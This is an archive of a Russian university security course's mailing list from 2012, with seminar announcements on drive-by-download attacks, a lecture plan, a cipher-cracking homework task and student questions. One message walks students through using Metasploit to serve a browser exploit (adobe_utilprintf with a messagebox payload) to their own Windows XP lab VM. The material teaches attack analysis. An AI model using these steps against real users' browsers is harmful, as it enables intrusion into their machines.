From gamajun at cs.msu.su  Thu Oct 11 20:05:52 2012
From: gamajun at cs.msu.su (Dennis Gamayunov)
Date: Fri, 12 Oct 2012 00:05:52 +0400
Subject: [infosec-course] =?utf-8?b?RndkOiBbc2VjLXNlbV0g0KHQtdC80LjQvdCw?=
 =?utf-8?b?0YDRiyDQv9C+IERiRC3QsNGC0LDQutCw0Lw=?=
In-Reply-To: <507725B2.4050202@lvk.cs.msu.su>
References: <507725B2.4050202@lvk.cs.msu.su>
Message-ID: <507726A0.8070901@cs.msu.su>

Dear list member, FYI анонс к ближайшим средам.


-------- Исходное сообщение --------
Тема: 	[sec-sem] Семинары по DbD-атакам
Дата: 	Fri, 12 Oct 2012 00:01:54 +0400
От: 	Razdobarov Alexandr <korse at lvk.cs.msu.su>
Отвечать: 	LVK security seminar mailing list <sec-sem at lvk.cs.msu.su>
Кому: 	sec-sem at lvk.cs.msu.su, course at secsem.ru



Всем привет!
Следующие несколько (количество будет зависеть от вас :)) семинаров 
будут посвящены  наиболее актуальному на сегодняшний день способу 
распространения ВПО, а именно drive-by-download атакам.
Предполагается, что в ходе посещения занятий вы должны получить 
следующие навыки:
1. Подготовка необходимого для исследования атаки окружения.
2. Отнесение кода к классу вредоносного или легитимного.
3. Деобфускация JavaScript-кода.
4. Определение эксплуатируемой уязвимости и используемой полезной нагрузки.

Семинары будут проходить в формате workshop'ов, т.е. вам будет дана 
общая информация по теме, далее вы будете стараться самостоятельно 
применять полученную информацию на практике.  В связи с тем, что объем 
материала большой, а времени мало, часть практических заданий будет 
оставлена вам на дом.
Для experienced-юзеров будет поднят стенд для самостоятельной работы.

К следующему семинару (17.10.12) необходимо:
1. Принести ноутбук с установленным ПО (список в конце письма). Если у 
вас нет возможности принести ноутбук, сообщите об этом, пожалуйста, 
заранее мне, либо кому-нибудь из руководителей семинара.
2. Изучить краткий мануал по языку JavaScript (это является ключевым 
фактором для успешного прохождения семинаров) по ссылке: 
http://www.w3schools.com/js/default.asp

Если вы знаете кого-нибудь кому может быть интересно данное письмо, то 
не стесняйтесь его перенаправлять.
Первый семинар начнется 17 октября в 18-05 в большом классе аудитории 247а.

Список ПО:
1. Виртуальная машина (рекомендуется использовать Virtual Box) c Windows 
XP sp2 и браузером IE 6 или IE 7. На виртуальной машине должна быть 
настроена сеть на NAT или физическое подключение к внешней сети (bridged).
Следующее ПО необходимо устанавить на гостевую машину:
1. HTTP-Proxy (примеры будут показаны на Fiddler, но вы можете 
использовать что вам удобнее).
2. JavaScript IDE. Примеры на семинаре будут показаны на WebStorm, но вы 
можете использовать что вам удобнее. Если будете ставить WebStorm, то 
обратитесь за лицензией к Андрею Петухову (petand at lvk.cs.msu.su).
3. Браузер Firefox с плагином Firebug, также можно использовать Google 
Chrome с developer tools.

Дополнительно можно установить:
Плагин для Firefox FoxyProxy - позволяет удобно записывать условия для 
использования браузером прокси-серверов.
Если будете использовать WebStorm, то можно установить плагин для 
отладки кода (он устанавливается из IDE), и настроить в firebug для 
редактирование файлов через внешний текстовый редактор.

-- 
С уважением,
Раздобаров Александр
_______________________________________________
sec-sem mailing list
sec-sem at lvk.cs.msu.su
https://lists.lvk.cs.msu.su/cgi-bin/mailman/listinfo/sec-sem







From evgsyr at gmail.com  Sat Oct 13 11:34:19 2012
From: evgsyr at gmail.com (=?UTF-8?B?0JXQstCz0LXQvdC40Lkg0KHRi9GA0L7QvNGP0YLQvdC40LrQvtCy?=)
Date: Sat, 13 Oct 2012 15:34:19 +0400
Subject: [infosec-course] =?utf-8?b?W9Cb0LXQutGG0LjQuCDQvdCwINCS0JzQml0g?=
	=?utf-8?b?0KHQv9C10YbQutGD0YDRgSDCq9CQ0YDRhdC40YLQtdC60YLRg9GA0LAg?=
	=?utf-8?b?0YHQvtCy0YDQtdC80LXQvdC90YvRhSDQvNCw0LvRi9GFINC4INGB0YA=?=
	=?utf-8?b?0LXQtNC90LjRhSDQrdCS0JzCuw==?=
Message-ID: <CACGkJdsTpg3p1+P5rFEQ6HxsWOjUnEv+aaKnnwNR2GXWDenprg@mail.gmail.com>

День добрый.

15 октября 2012 года (понедельник) в 18:00 в аудитории 73 второго
учебного корпуса МГУ пройдёт первая лекция по курсу «Архитектура
современных малых и средних ЭВМ».

Спецкурс предназначен для студентов, желающих получить знания и
навыки, связанные с архитектурой современных малых и средних ЭВМ. В
рамках курса планируется рассмотреть особенности организации различных
процессорных архитектур, видов запоминающих устройств,
коммуникационных интерфейсов и протоколов, сделать обзор некоторых
технологий, используемых в современой вычислительной технике. Основной
акцент предполагается сделать на аспектах, связанных с программным
взаимодействием с различными компонентами вычислительных систем и
управлением ими.

Лекции читают Денис Гамаюнов и Евгений Сыромятников.

== Ссылки ==
 — https://uneex.org/LecturesCMC/ComputerArchitecture2012 — страница с
информацией о курсе

== Тематический план курса ==
 * Представление, передача и хранение информации в рамках
вычислительных систем. Краткий обзор архитектур ВС.
  * Вопрос кодирования информации; различимость состояний, передача
состояний, храненние состояний.
  * Механическое представление.
  * Реле.
   * Логические операции.
   * Генератор тактовой частоты.
   * Вентили.
   * Библиотека стандартных компонент.
   * Реализация памяти.
  * Полупроводниковые транзисторы.
   * Изготовление ИС и печатных плат.
  * Особенности передачи электрических сигналов.
  * Понятие программы, архитектура ВС.
  * Обзор различных архитектур ВС.
 * Организация программируемых вычислительных устройств (процессоров).
  * Общая схема работы.
  * Особенности различных архитектур: микрокоманды, конвейер, кэш
данных, кэш команд, prefetch, branch prediction/спекулятивое
исполнение, векторные команды.
  * Обзор различных архитектур процессоров.
 * Организация запоминающих устройств с произвольным доступом (память).
  * Общее устройство памяти, виды памяти (SRAM, DRAM), общая схема
работы. Характеристики памяти.
  * Взаимодействие процессора и памяти.
   * Контроллер памяти.
   * Кэширование.
   * Full buffering.
  * Взаимодействие памяти и иных устройств (PIO, DMA).
  * ECC.
  * Обзор различных видов памяти.
 * Адресация
  * Организация адресации памяти. Адресное пространство.
  * Страничная адресация памяти. MMU. Таблицы страниц. PAE, PSE.
  * Отображение памяти устройств, shadowing.
   * IOMMU.
  * Схема организации и адресации памяти в различных архтектурах.
 * Процесс начальной загрузки
  * Последовательность действий при начальной загрузке.
  * Особенности организации начальной загрузки в x86. BIOS, POST.
   * ACPI.
  * EFI.
 * Периферийные устройства.
  * Взаимодействие устройств.
   * Порты ввода/вывода.
   * Отображение адресного пространства.
   * DMA.
   * Взаимодействие между устройствами.
   * Прерывания.
  * Обзор различных интерфейсов подключения периферийных устройств.
   * Интерфейсы COM и LPT.
   * Интерфейсы IDE, SCSI, SATA.
   * USB, !FireWire, !DisplayPort/Thunderbolt.
   * ISA, PCI, PCIe.
   * !HyperTransport.
 * Коммуникационные интерфейсы.
  * Структура и архитектура коммуникационного адаптера.
   * Структура и архитектура маршрутизатора коммуикационной сети.
   * Взаимодействие коммуникационного адаптера с хост-системой.
   * Ethernet, Fibre Channel, !InfiniBand.
 * Видеоподсистема.
  * Схема организации работы видеопосистемы.
  * GPU как вычислитель. Архитектура, принципы работы.
 * Хранение данных.
 * Сенсоры и датчики.
 * Многопроцессорные и многоузловые системы.
  * Взаимодействие ядер, процессоров, узлов.
  * RDMA.
  * Обзор многопроцессорных и многоузловых архитектур.
 * Особенности организации встраиваемых систем. Переменная тактовая
частота, power states, обзор архитектур.
 * Особенности организации отказоустойчивости. Поддержка hotswap,
организация redundancy.

-- 
Eugene "eSyr" Syromyatnikov
mailto:evgSyr at gmail.com
xmpp:eSyr at jabber.{ru|org}

From kero at mail.ru  Thu Oct 18 17:09:01 2012
From: kero at mail.ru (=?UTF-8?B?0KDQvtC80LDQvSDQmtC+0LvRg9C/0LDQtdCy?=)
Date: Thu, 18 Oct 2012 21:09:01 +0400
Subject: [infosec-course] =?utf-8?b?0JTQvtC80LDRiNC90LjQtSDQt9Cw0LTQsNC9?=
	=?utf-8?b?0LjRjw==?=
Message-ID: <1350580141.279451253@f212.mail.ru>

Добрый день.
Хотелось бы узнать, какие домашние задания, опубликованные на сайте (http://course.secsem.ru/tasks), актуальны на данный момент. Или задания будут полностью новые и только те, что упоминаются на лекции?


С уважением,
Колупаев Роман.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.secsem.ru/pipermail/course/attachments/20121018/f6a55356/attachment.html>

From gamajun at cs.msu.su  Fri Oct 19 15:02:50 2012
From: gamajun at cs.msu.su (Dennis Gamayunov)
Date: Fri, 19 Oct 2012 19:02:50 +0400
Subject: [infosec-course] =?utf-8?b?0L7RgtCy0LXRgtGB0YLQstC10L3QvdC+0LUg?=
	=?utf-8?b?0LfQsNC00LDQvdC40LU=?=
In-Reply-To: <CA+yJY8akX8hGB8NNSk_-N4-7-sdB5SunTeR_C_fD+JazS3sjiA@mail.gmail.com>
References: <CA+yJY8akX8hGB8NNSk_-N4-7-sdB5SunTeR_C_fD+JazS3sjiA@mail.gmail.com>
Message-ID: <50816B9A.7090008@cs.msu.su>

Коллеги,

Как мы и обещали, у нас есть новое задание.

В 1944 году при подготовке переворота и смещения Антонеску
румынскийкороль Михай I вызвал к себе молодого талантливого румынского
инженерасо славянскими корнями и приказал разработать копию секретной
немецкойшифровальной машины для нужд королевского подполья. Из-за
постоянногошума, создаваемого советской артиллерией близ границы с
Румынией в рамкахЯсско-Кишинёвской операции, инженер хронически не
высыпался, поэтому румынскийаналог шифровальной машины получился
несколько проще оригинала. Тем не менее, машина успешно пошла в
серию. Вам (совершенно случайно) попали в руки шифротексты этой машины.
Что в них?

В приложенном архиве 4 шифротекста, которые необходимо расшифровать.

С уважением,

Денис Гамаюнов

-------------- next part --------------
A non-text attachment was scrubbed...
Name: enigma_release.zip
Type: application/zip
Size: 5773 bytes
Desc: not available
URL: <http://lists.secsem.ru/pipermail/course/attachments/20121019/121035ea/attachment.zip>

From rus_0580 at mail.ru  Thu Oct 25 17:51:07 2012
From: rus_0580 at mail.ru (=?UTF-8?B?0KDRg9GB0LvQsNC9INCT0LDQudGC0YPQutC40LXQsg==?=)
Date: Thu, 25 Oct 2012 21:51:07 +0400
Subject: [infosec-course]
 =?utf-8?b?0JTQsNC50LTQttC10YHRgiDRgdC/0LjRgdC6?=
 =?utf-8?b?0LAg0YDQsNGB0YHRi9C70LrQuCBjb3Vyc2U7INGC0L7QvCAxOCwg0LLRi9C/?=
 =?utf-8?b?0YPRgdC6IDQ=?=
In-Reply-To: <mailman.1.1350720002.8049.course@secsem.ru>
References: <mailman.1.1350720002.8049.course@secsem.ru>
Message-ID: <1351187467.220741920@f131.mail.ru>

Добрый вечер.

Хочу уточнить задание, оно к какому сроку? Я правильно понял, что нам по факту ни ключ, ни криптосистема неизвестны? Сообщения были перехвачены у военных (это к некоторому формату и осмысленности текста)? И язык plaintexta английский и пробелы оставались пробелами?

С уважением, 
Руслан


Sat, 20 Oct 2012 12:00:02 +0400 от course-request at secsem.ru:
>	
>
>
	
	
>
		
		
			
>Сообщения, предназначенные для списка рассылки course, необходимо
>
отправлять по адресу
>
	course at secsem.ru
>
>
Для изменения параметров подписки вы можеже использовать веб-страницу
>
	http://lists.secsem.ru/cgi-bin/mailman/listinfo/course
>
>
Для получения информации о том, как пользовать почтовым интерфейсом,
>
отправьте письмо, в теле или теме которого будет слово 'help', по
>
адресу:
>
	course-request at secsem.ru
>
>
Адрес человека, ответственного за этот список рассылки:
>
	course-owner at secsem.ru
>
>
При ответе, пожалуйста, измение тему письма так, чтобы она была более
>
содержательной чем "Re: Содержание дайджеста списка рассылки
>
course..."
>
>
>
В этом номере:
>
>
   1. ответственное задание (Dennis Gamayunov)
>
>
>
----------------------------------------------------------------------
>
>
Message: 1
>
Date: Fri, 19 Oct 2012 19:02:50 +0400
>
From: Dennis Gamayunov <gamajun at cs.msu.su>
>
Subject: [infosec-course] ответственное задание
>
To: InfoSec course mailing list <course at secsem.ru>
>
Message-ID: <50816B9A.7090008 at cs.msu.su>
>
Content-Type: text/plain; charset="utf-8"
>
>
Коллеги,
>
>
Как мы и обещали, у нас есть новое задание.
>
>
В 1944 году при подготовке переворота и смещения Антонеску
>
румынскийкороль Михай I вызвал к себе молодого талантливого румынского
>
инженерасо славянскими корнями и приказал разработать копию секретной
>
немецкойшифровальной машины для нужд королевского подполья. Из-за
>
постоянногошума, создаваемого советской артиллерией близ границы с
>
Румынией в рамкахЯсско-Кишинёвской операции, инженер хронически не
>
высыпался, поэтому румынскийаналог шифровальной машины получился
>
несколько проще оригинала. Тем не менее, машина успешно пошла в
>
серию. Вам (совершенно случайно) попали в руки шифротексты этой машины.
>
Что в них?
>
>
В приложенном архиве 4 шифротекста, которые необходимо расшифровать.
>
>
С уважением,
>
>
Денис Гамаюнов
>
>
----------- следущая часть -----------
>
A non-text attachment was scrubbed...
>
Name: enigma_release.zip
>
Type: application/zip
>
Size: 5773 bytes
>
Desc: отсутствует
>
URL: <http://lists.secsem.ru/pipermail/course/attachments/20121019/121035ea/attachment-0001.zip>
>
>
------------------------------
>
>
_______________________________________________
>
course mailing list
>course at secsem.ru
>http://lists.secsem.ru/cgi-bin/mailman/listinfo/course
>
>
>
Конец Дайджест списка рассылки course; том 18, выпуск 4
>
*******************************************************
>
			
		
		
	

	
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.secsem.ru/pipermail/course/attachments/20121025/0d477c5d/attachment.html>

From gamajun at cs.msu.su  Thu Oct 25 17:57:39 2012
From: gamajun at cs.msu.su (Dennis Gamayunov)
Date: Thu, 25 Oct 2012 21:57:39 +0400
Subject: [infosec-course]
 =?utf-8?b?0JTQsNC50LTQttC10YHRgiDRgdC/0LjRgdC6?=
 =?utf-8?b?0LAg0YDQsNGB0YHRi9C70LrQuCBjb3Vyc2U7INGC0L7QvCAxOCwg0LLRi9C/?=
 =?utf-8?b?0YPRgdC6IDQ=?=
In-Reply-To: <1351187467.220741920@f131.mail.ru>
References: <mailman.1.1350720002.8049.course@secsem.ru>
	<1351187467.220741920@f131.mail.ru>
Message-ID: <50897D93.8070705@cs.msu.su>

Ключ неизвестен, а вся остальная информация содержится в тексте задания.

Денис

25.10.2012 21:51, Руслан Гайтукиев пишет:
> Добрый вечер.
>
> Хочу уточнить задание, оно к какому сроку? Я правильно понял, что нам
> по факту ни ключ, ни криптосистема неизвестны? Сообщения были
> перехвачены у военных (это к некоторому формату и осмысленности
> текста)? И язык plaintexta английский и пробелы оставались пробелами?
>
> С уважением, 
> Руслан
>
>
> Sat, 20 Oct 2012 12:00:02 +0400 от course-request at secsem.ru:
>
>     Сообщения, предназначенные для списка рассылки course, необходимо
>     отправлять по адресу
>     course at secsem.ru <sentmsg?compose&To=course at secsem.ru>
>
>     Для изменения параметров подписки вы можеже использовать веб-страницу
>     http://lists.secsem.ru/cgi-bin/mailman/listinfo/course
>
>     Для получения информации о том, как пользовать почтовым интерфейсом,
>     отправьте письмо, в теле или теме которого будет слово 'help', по
>     адресу:
>     course-request at secsem.ru
>     <sentmsg?compose&To=course%2drequest at secsem.ru>
>
>     Адрес человека, ответственного за этот список рассылки:
>     course-owner at secsem.ru <sentmsg?compose&To=course%2downer at secsem.ru>
>
>     При ответе, пожалуйста, измение тему письма так, чтобы она была более
>     содержательной чем "Re: Содержание дайджеста списка рассылки
>     course..."
>
>
>     В этом номере:
>
>        1. ответственное задание (Dennis Gamayunov)
>
>
>     ----------------------------------------------------------------------
>
>     Message: 1
>     Date: Fri, 19 Oct 2012 19:02:50 +0400
>     From: Dennis Gamayunov <gamajun at cs.msu.su
>     <sentmsg?compose&To=gamajun at cs.msu.su>>
>     Subject: [infosec-course] ответственное задание
>     To: InfoSec course mailing list <course at secsem.ru
>     <sentmsg?compose&To=course at secsem.ru>>
>     Message-ID: <50816B9A.7090008 at cs.msu.su
>     <sentmsg?compose&To=50816B9A.7090008 at cs.msu.su>>
>     Content-Type: text/plain; charset="utf-8"
>
>     Коллеги,
>
>     Как мы и обещали, у нас есть новое задание.
>
>     В 1944 году при подготовке переворота и смещения Антонеску
>     румынскийкороль Михай I вызвал к себе молодого талантливого румынского
>     инженерасо славянскими корнями и приказал разработать копию секретной
>     немецкойшифровальной машины для нужд королевского подполья. Из-за
>     постоянногошума, создаваемого советской артиллерией близ границы с
>     Румынией в рамкахЯсско-Кишинёвской операции, инженер хронически не
>     высыпался, поэтому румынскийаналог шифровальной машины получился
>     несколько проще оригинала. Тем не менее, машина успешно пошла в
>     серию. Вам (совершенно случайно) попали в руки шифротексты этой
>     машины.
>     Что в них?
>
>     В приложенном архиве 4 шифротекста, которые необходимо расшифровать.
>
>     С уважением,
>
>     Денис Гамаюнов
>
>     ----------- следущая часть -----------
>     A non-text attachment was scrubbed...
>     Name: enigma_release.zip
>     Type: application/zip
>     Size: 5773 bytes
>     Desc: отсутствует
>     URL:
>     <http://lists.secsem.ru/pipermail/course/attachments/20121019/121035ea/attachment-0001.zip>
>
>     ------------------------------
>
>     _______________________________________________
>     course mailing list
>     course at secsem.ru <sentmsg?compose&To=course at secsem.ru>
>     http://lists.secsem.ru/cgi-bin/mailman/listinfo/course
>
>
>     Конец Дайджест списка рассылки course; том 18, выпуск 4
>     *******************************************************
>
>
>
>
> _______________________________________________
> course mailing list
> course at secsem.ru
> http://lists.secsem.ru/cgi-bin/mailman/listinfo/course




From ngo at lvk.cs.msu.su  Tue Oct 30 07:26:23 2012
From: ngo at lvk.cs.msu.su (George Noseevich)
Date: Tue, 30 Oct 2012 11:26:23 +0400
Subject: [infosec-course]
 =?utf-8?b?W3NlYy1zZW1dINCh0LXQvNC40L3QsNGA0Ysg?=
 =?utf-8?b?0L/QviBEYkQt0LDRgtCw0LrQsNC8?=
In-Reply-To: <508EF199.80701@lvk.cs.msu.su>
References: <507725B2.4050202@lvk.cs.msu.su> <50772ACF.1000000@lvk.cs.msu.su>
	<507EFF1F.3080403@lvk.cs.msu.su> <508EF199.80701@lvk.cs.msu.su>
Message-ID: <508F811F.2050606@lvk.cs.msu.su>

Дамы и господа! Xочу дополнительно заметить следующее:

1) Приносите патч-корды, их может не хватить.
2) На прошлом семинаре было некоторое количество людей без ноутбуков.
Довольно бессмысленно приходить на воркшоп по practical security с одним
блокнотом.
3) То же самое касается окружения, которое требуется для семинара.
Заранеее убедитесь, что все работает!
4) Предполагается, что к началу семинара у всех вас ноутбуки уже
включены, сеть работает, виртуалки запущены, инструменты готовы к работе
и т.п.. Это позволит с наибольшей продуктивностью использовать время
семинара.

/ngo
On 30.10.2012 01:14, Razdobarov Alexandr wrote:
> Дамы и господа,
> в эту среду (18-05 31 октября) пройдет второй семинар по DbD-атакам,
> на котором будет рассмотрен ещё один метод деобфускации
> JavaScript-кода, а также методы и инструменты для анализа вредоносных
> pdf-файлов.
>
> Для следующего семинара необходимо установить: python 2.7 и скачать
> скрипт pdf-parser.py по ссылке:
> http://didierstevens.com/files/software/pdf-parser_V0_3_9.zip. Также
> необходимо убедиться, что это все вместе работает, запустив из под
> консоли: python pdf-parser.py.
>
> В качестве подготовки к семинару заинтересованным предлагается сделать
> следующее:
> 1. Установить на виртуалку (или хостовую систему) metasploit. Система
> с metasploit'ом будет выступать в качестве сервера, на котором будет
> размещаться вредоносный код. Атакуемый клиент - виртуальная машина с
> windows XP.
> 2. Запустить msfconsole
> 2.1 Найти подходящий remote exploit:
>     Для поиска используется команда search, начните с команды "search
> -h", там описываются параметры поиска. Пример поискового запроса:
> "search platform:windows type:exploit app:client". В качестве текста
> для поиска можно использовать характерные словосочетания, например,
> heap spray. Также эксплоиты показываются при нажатии таб в команде
> use. Таким образом, если набрать use exploit/windows/browser/ и нажать
> таб, то будут показанные все эксплоиты, подходящие под набранный путь.
> 2.2 Когда выберете экплоит необходимо его подключить, пример:
>         use exploit/windows/browser/adobe_utilprintf
> 2.3 Для эксплоитов указывается список допустимых целей, посмотреть его
> можно следующей командой:
>         show targets
> 2.4 Убедитесь, что эксплоит подходит для вашей виртуальной машины
> windows XP. Возможно будет проще дополнительно поставить туда Acrobat
> Reader или Java, старые версии этих продуктов можно скачать с
> http://www.oldapps.com.
> 2.5 Теперь нужно выбрать payload - "show payloads". Payload выбирается
> командой set payload, например:
>         "set payload windows/messagebox"
> 2.6 После выбора нагрузки остается задать опции запуска эксплоита,
> посмотреть их можно командой "show options". Опции задаются командой
> "set optionName optionValue", так для messagebox можно задать текст и
> заголовок окна:
>         set text 'Hello world'
>         set title 'msgbox'
> и задать путь, по которому будет размещен эксплоит на сервере:
>         set uripath myawesomesploit
>
> 2.7 После того, как все опции установлены остается запустить эксплоит
> командой "exploit". В случае успешного запуска, msfconsole выведет вам
> список путей по которым доступен эксплоит, что-нибудь вроде:
>     http://192.168.1.10:8080/myawesomesploit
> Список активных эксплоитов на сервере можно посмотреть командой "jobs".
>
> 3. После того, как вы запустили эксплоит, остается запустить на
> виртуальной машине логгирующий HTTP-Proxy и зайти на созданный сайт.
> После работы эксплоита проанализируйте траффик. Также можно посмотреть
> результаты анализа эксплоита антивирусами на сайте virustotal.com.
>




From gamajun at cs.msu.su  Tue Oct 30 19:31:29 2012
From: gamajun at cs.msu.su (Dennis Gamayunov)
Date: Tue, 30 Oct 2012 22:31:29 +0300
Subject: [infosec-course] =?utf-8?b?0L/QtdGA0LXQvdC+0YEg0LvQtdC60YbQuNC4?=
	=?utf-8?b?IDEg0L3QvtGP0LHRgNGP?=
Message-ID: <50902B11.6010009@cs.msu.su>

Коллеги,

Лекция по спецкурсу переносится с этого четверга 1 ноября на следующий. 
В этот четверг лекции не будет.

С уважением,

Денис Гамаюнов